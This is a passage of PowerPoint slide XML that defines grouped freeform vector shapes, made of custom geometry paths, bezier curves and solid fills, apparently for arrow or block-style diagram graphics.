                    <a:gd name="T13" fmla="*/ 40 h 526"/>
                    <a:gd name="T14" fmla="*/ 0 w 2060"/>
                    <a:gd name="T15" fmla="*/ 114 h 526"/>
                    <a:gd name="T16" fmla="*/ 1517 w 2060"/>
                    <a:gd name="T17" fmla="*/ 526 h 526"/>
                    <a:gd name="T18" fmla="*/ 2060 w 2060"/>
                    <a:gd name="T19" fmla="*/ 380 h 5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0" h="526">
                      <a:moveTo>
                        <a:pt x="2060" y="380"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2007" y="352"/>
                        <a:pt x="1777" y="267"/>
                        <a:pt x="1728" y="268"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1678" y="269"/>
                        <a:pt x="1547" y="265"/>
                        <a:pt x="1516" y="248"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1482" y="230"/>
                        <a:pt x="1339" y="172"/>
                        <a:pt x="1279" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1219" y="164"/>
                        <a:pt x="988" y="88"/>
                        <a:pt x="928" y="88"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="867" y="88"/>
                        <a:pt x="600" y="0"/>
                        <a:pt x="563" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="526" y="8"/>
                        <a:pt x="303" y="32"/>
                        <a:pt x="275" y="40"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="247" y="48"/>
                        <a:pt x="73" y="104"/>
                        <a:pt x="0" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1517" y="526"/>
                        <a:pt x="1517" y="526"/>
                        <a:pt x="1517" y="526"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="2060" y="380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25400" dir="54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49" name="Freeform 417"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="5621399" y="1475844"/>
              <a:ext cx="1830961" cy="492951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CACACA"/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50" name="Freeform 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="1737360" y="2576660"/>
              <a:ext cx="1814059" cy="485909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51" name="Freeform 67"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3853173" y="1867782"/>
              <a:ext cx="1819693" cy="487317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52" name="Group 223"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="6750672" y="1892595"/>
              <a:ext cx="549288" cy="164787"/>
              <a:chOff x="1728" y="-938"/>
              <a:chExt cx="3134" cy="936"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="253" name="Freeform 224"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1728" y="-699"/>
                <a:ext cx="196" cy="630"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 196"/>
                  <a:gd name="T1" fmla="*/ 0 h 630"/>
                  <a:gd name="T2" fmla="*/ 0 w 196"/>
                  <a:gd name="T3" fmla="*/ 97 h 630"/>
                  <a:gd name="T4" fmla="*/ 196 w 196"/>
                  <a:gd name="T5" fmla="*/ 630 h 630"/>
                  <a:gd name="T6" fmla="*/ 196 w 196"/>
                  <a:gd name="T7" fmla="*/ 534 h 630"/>
                  <a:gd name="T8" fmla="*/ 0 w 196"/>
                  <a:gd name="T9" fmla="*/ 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630">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="5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54" name="Freeform 225"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1924" y="-165"/>
                <a:ext cx="2043" cy="163"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T1" fmla="*/ 163 h 163"/>
                  <a:gd name="T2" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T3" fmla="*/ 68 h 163"/>
                  <a:gd name="T4" fmla="*/ 0 w 2043"/>
                  <a:gd name="T5" fmla="*/ 0 h 163"/>
                  <a:gd name="T6" fmla="*/ 0 w 2043"/>
                  <a:gd name="T7" fmla="*/ 96 h 163"/>
                  <a:gd name="T8" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T9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43" h="163">
                    <a:moveTo>
                      <a:pt x="2043" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2043" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2043" y="163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55" name="Freeform 226"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3518" y="-579"/>
                <a:ext cx="1344" cy="456"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 456"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 95 h 456"/>
                  <a:gd name="T4" fmla="*/ 0 w 1344"/>
                  <a:gd name="T5" fmla="*/ 456 h 456"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 362 h 456"/>
                  <a:gd name="T8" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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6">
                    <a:moveTo>
                      <a:pt x="1344" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344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56" name="Freeform 227"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1728" y="-938"/>
                <a:ext cx="3134" cy="841"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 196 w 3134"/>
                  <a:gd name="T1" fmla="*/ 773 h 841"/>
                  <a:gd name="T2" fmla="*/ 0 w 3134"/>
                  <a:gd name="T3" fmla="*/ 239 h 841"/>
                  <a:gd name="T4" fmla="*/ 446 w 3134"/>
                  <a:gd name="T5" fmla="*/ 359 h 841"/>
                  <a:gd name="T6" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T7" fmla="*/ 0 h 841"/>
                  <a:gd name="T8" fmla="*/ 3134 w 3134"/>
                  <a:gd name="T9" fmla="*/ 359 h 841"/>
                  <a:gd name="T10" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T11" fmla="*/ 721 h 841"/>
                  <a:gd name="T12" fmla="*/ 2239 w 3134"/>
                  <a:gd name="T13" fmla="*/ 841 h 841"/>
                  <a:gd name="T14" fmla="*/ 196 w 3134"/>
                  <a:gd name="T15" fmla="*/ 773 h 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4" h="841">
                    <a:moveTo>
                      <a:pt x="196" y="773"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3134" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="773"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="0061B2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257" name="Freeform 229"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="6594231" y="1967784"/>
              <a:ext cx="1812651" cy="485908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>
              <a:prstTxWarp prst="textFadeUp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58" name="Group 298"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="7649146" y="1604409"/>
              <a:ext cx="553514" cy="566189"/>
              <a:chOff x="3301" y="2305"/>
              <a:chExt cx="1193" cy="1219"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="259" name="Freeform 299"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3384" y="2320"/>
                <a:ext cx="78" cy="919"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 165 w 165"/>
                  <a:gd name="T1" fmla="*/ 0 h 1918"/>
                  <a:gd name="T2" fmla="*/ 165 w 165"/>
                  <a:gd name="T3" fmla="*/ 1873 h 1918"/>
                  <a:gd name="T4" fmla="*/ 0 w 165"/>
                  <a:gd name="T5" fmla="*/ 1918 h 1918"/>
                  <a:gd name="T6" fmla="*/ 0 w 165"/>
                  <a:gd name="T7" fmla="*/ 42 h 1918"/>
                  <a:gd name="T8" fmla="*/ 165 w 165"/>
                  <a:gd name="T9" fmla="*/ 0 h 19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5" h="1918">
                    <a:moveTo>
                      <a:pt x="165" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="165" y="1873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1918"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="42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80808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0" name="Freeform 300"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4332" y="2611"/>
                <a:ext cx="54" cy="913"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 114"/>
                  <a:gd name="T1" fmla="*/ 0 h 1904"/>
                  <a:gd name="T2" fmla="*/ 0 w 114"/>
                  <a:gd name="T3" fmla="*/ 1873 h 1904"/>
                  <a:gd name="T4" fmla="*/ 114 w 114"/>
                  <a:gd name="T5" fmla="*/ 1904 h 1904"/>
                  <a:gd name="T6" fmla="*/ 114 w 114"/>
                  <a:gd name="T7" fmla="*/ 31 h 1904"/>
                  <a:gd name="T8" fmla="*/ 0 w 114"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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" h="1904">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="1904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114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969696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1" name="Freeform 301"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3329" y="2326"/>
                <a:ext cx="55" cy="913"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 113"/>
                  <a:gd name="T1" fmla="*/ 0 h 1904"/>
                  <a:gd name="T2" fmla="*/ 0 w 113"/>
                  <a:gd name="T3" fmla="*/ 1873 h 1904"/>
                  <a:gd name="T4" fmla="*/ 113 w 113"/>
                  <a:gd name="T5" fmla="*/ 1904 h 1904"/>
                  <a:gd name="T6" fmla="*/ 113 w 113"/>
                  <a:gd name="T7" fmla="*/ 28 h 1904"/>
                  <a:gd name="T8" fmla="*/ 0 w 113"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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3" h="1904">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="1904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="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80808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62" name="Group 302"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3355" y="2420"/>
                <a:ext cx="977" cy="405"/>
                <a:chOff x="806" y="1728"/>
                <a:chExt cx="2036" cy="845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="267" name="Freeform 303"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="806" y="1728"/>
                  <a:ext cx="2036" cy="621"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 2036"/>
                    <a:gd name="T1" fmla="*/ 0 h 621"/>
                    <a:gd name="T2" fmla="*/ 0 w 2036"/>
                    <a:gd name="T3" fmla="*/ 73 h 621"/>
                    <a:gd name="T4" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T5" fmla="*/ 621 h 621"/>
                    <a:gd name="T6" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T7" fmla="*/ 545 h 621"/>
                    <a:gd name="T8" fmla="*/ 0 w 2036"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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36" h="621">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="621"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="54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68" name="Freeform 304"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="806" y="1801"/>
                  <a:ext cx="2036" cy="621"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 2036"/>
                    <a:gd name="T1" fmla="*/ 0 h 621"/>
                    <a:gd name="T2" fmla="*/ 0 w 2036"/>
                    <a:gd name="T3" fmla="*/ 76 h 621"/>
                    <a:gd name="T4" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T5" fmla="*/ 621 h 621"/>
                    <a:gd name="T6" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T7" fmla="*/ 548 h 621"/>
                    <a:gd name="T8" fmla="*/ 0 w 2036"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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36" h="621">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="76"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="621"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="5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69" name="Freeform 305"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="806" y="1877"/>
                  <a:ext cx="2036" cy="621"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 2036"/>
                    <a:gd name="T1" fmla="*/ 0 h 621"/>
                    <a:gd name="T2" fmla="*/ 0 w 2036"/>
                    <a:gd name="T3" fmla="*/ 75 h 621"/>
                    <a:gd name="T4" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T5" fmla="*/ 621 h 621"/>
                    <a:gd name="T6" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T7" fmla="*/ 545 h 621"/>
                    <a:gd name="T8" fmla="*/ 0 w 2036"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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36" h="621">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="75"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="621"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="54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Freeform 306"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="806" y="1952"/>
                  <a:ext cx="2036" cy="621"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 2036"/>
                    <a:gd name="T1" fmla="*/ 0 h 621"/>
                    <a:gd name="T2" fmla="*/ 0 w 2036"/>
                    <a:gd name="T3" fmla="*/ 73 h 621"/>
                    <a:gd name="T4" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T5" fmla="*/ 621 h 621"/>
                    <a:gd name="T6" fmla="*/ 2036 w 2036"/>
                    <a:gd name="T7" fmla="*/ 546 h 621"/>
                    <a:gd name="T8" fmla="*/ 0 w 2036"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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36" h="621">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="73"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="621"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2036" y="54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63" name="Freeform 307"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3301" y="2333"/>
                <a:ext cx="54" cy="914"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 113"/>
                  <a:gd name="T1" fmla="*/ 0 h 1904"/>
                  <a:gd name="T2" fmla="*/ 0 w 113"/>
                  <a:gd name="T3" fmla="*/ 1876 h 1904"/>
                  <a:gd name="T4" fmla="*/ 113 w 113"/>
                  <a:gd name="T5" fmla="*/ 1904 h 1904"/>
                  <a:gd name="T6" fmla="*/ 113 w 113"/>
                  <a:gd name="T7" fmla="*/ 31 h 1904"/>
                  <a:gd name="T8" fmla="*/ 0 w 113"/>
                  <a:gd name="T9" fmla="*/ 0 h 1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3" h="1904">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1876"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="1904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113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969696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4" name="Freeform 308"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4386" y="2596"/>
                <a:ext cx="108" cy="928"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 224 w 224"/>
                  <a:gd name="T1" fmla="*/ 0 h 1935"/>
                  <a:gd name="T2" fmla="*/ 224 w 224"/>
                  <a:gd name="T3" fmla="*/ 1873 h 1935"/>
                  <a:gd name="T4" fmla="*/ 0 w 224"/>
                  <a:gd name="T5" fmla="*/ 1935 h 1935"/>
                  <a:gd name="T6" fmla="*/ 0 w 224"/>
                  <a:gd name="T7" fmla="*/ 62 h 1935"/>
                  <a:gd name="T8" fmla="*/ 224 w 224"/>
                  <a:gd name="T9" fmla="*/ 0 h 19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4" h="1935">
                    <a:moveTo>
                      <a:pt x="224" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="224" y="1873"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1935"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62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80808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5" name="Freeform 309"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3355" y="2348"/>
                <a:ext cx="977" cy="333"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2036"/>
                  <a:gd name="T1" fmla="*/ 0 h 694"/>
                  <a:gd name="T2" fmla="*/ 0 w 2036"/>
                  <a:gd name="T3" fmla="*/ 149 h 694"/>
                  <a:gd name="T4" fmla="*/ 2036 w 2036"/>
                  <a:gd name="T5" fmla="*/ 694 h 694"/>
                  <a:gd name="T6" fmla="*/ 2036 w 2036"/>
                  <a:gd name="T7" fmla="*/ 548 h 694"/>
                  <a:gd name="T8" fmla="*/ 0 w 2036"/>
                  <a:gd name="T9" fmla="*/ 0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36" h="694">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2036" y="694"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2036" y="5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969696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6" name="Freeform 310"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3301" y="2305"/>
                <a:ext cx="1193" cy="320"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2487"/>
                  <a:gd name="T1" fmla="*/ 59 h 669"/>
                  <a:gd name="T2" fmla="*/ 224 w 2487"/>
                  <a:gd name="T3" fmla="*/ 0 h 669"/>
                  <a:gd name="T4" fmla="*/ 2487 w 2487"/>
                  <a:gd name="T5" fmla="*/ 607 h 669"/>
                  <a:gd name="T6" fmla="*/ 2263 w 2487"/>
                  <a:gd name="T7" fmla="*/ 669 h 669"/>
                  <a:gd name="T8" fmla="*/ 0 w 2487"/>
                  <a:gd name="T9" fmla="*/ 59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7" h="669">
                    <a:moveTo>
                      <a:pt x="0" y="59"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="224" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2487" y="607"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2263" y="669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80808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71" name="Group 542"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="5460515" y="1883630"/>
              <a:ext cx="512669" cy="153519"/>
              <a:chOff x="-240" y="-1656"/>
              <a:chExt cx="3137" cy="940"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="272" name="Freeform 543"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="658" y="-1656"/>
                <a:ext cx="446" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 446"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 446"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
                  <a:gd name="T4" fmla="*/ 446 w 446"/>
                  <a:gd name="T5" fmla="*/ 217 h 217"/>
                  <a:gd name="T6" fmla="*/ 446 w 446"/>
                  <a:gd name="T7" fmla="*/ 120 h 217"/>
                  <a:gd name="T8" fmla="*/ 0 w 446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6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6" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446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1B2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3" name="Freeform 544"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-240" y="-1656"/>
                <a:ext cx="3137" cy="843"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T1" fmla="*/ 54 h 843"/>
                  <a:gd name="T2" fmla="*/ 898 w 3137"/>
                  <a:gd name="T3" fmla="*/ 0 h 843"/>
                  <a:gd name="T4" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T5" fmla="*/ 120 h 843"/>
                  <a:gd name="T6" fmla="*/ 0 w 3137"/>
                  <a:gd name="T7" fmla="*/ 482 h 843"/>
                  <a:gd name="T8" fmla="*/ 1344 w 3137"/>
                  <a:gd name="T9" fmla="*/ 843 h 843"/>
                  <a:gd name="T10" fmla="*/ 2688 w 3137"/>
                  <a:gd name="T11" fmla="*/ 482 h 843"/>
                  <a:gd name="T12" fmla="*/ 3137 w 3137"/>
                  <a:gd name="T13" fmla="*/ 602 h 843"/>
                  <a:gd name="T14" fmla="*/ 2887 w 3137"/>
                  <a:gd name="T15" fmla="*/ 54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7" h="843">
                    <a:moveTo>
                      <a:pt x="2887" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="898" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="843"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2688" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3137" y="602"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2887" y="54"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="0061B2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4" name="Freeform 545"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-240" y="-1174"/>
                <a:ext cx="1344" cy="458"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 458"/>
                  <a:gd name="T2" fmla="*/ 0 w 1344"/>
                  <a:gd name="T3" fmla="*/ 97 h 458"/>
                  <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T5" fmla="*/ 458 h 458"/>
                  <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T7" fmla="*/ 361 h 458"/>
                  <a:gd name="T8" fmla="*/ 0 w 1344"/>
                  <a:gd name="T9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0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1344" y="3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1B2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5" name="Freeform 546"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2448" y="-1174"/>
                <a:ext cx="449" cy="217"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 449"/>
                  <a:gd name="T1" fmla="*/ 0 h 217"/>
                  <a:gd name="T2" fmla="*/ 0 w 449"/>
                  <a:gd name="T3" fmla="*/ 97 h 217"/>
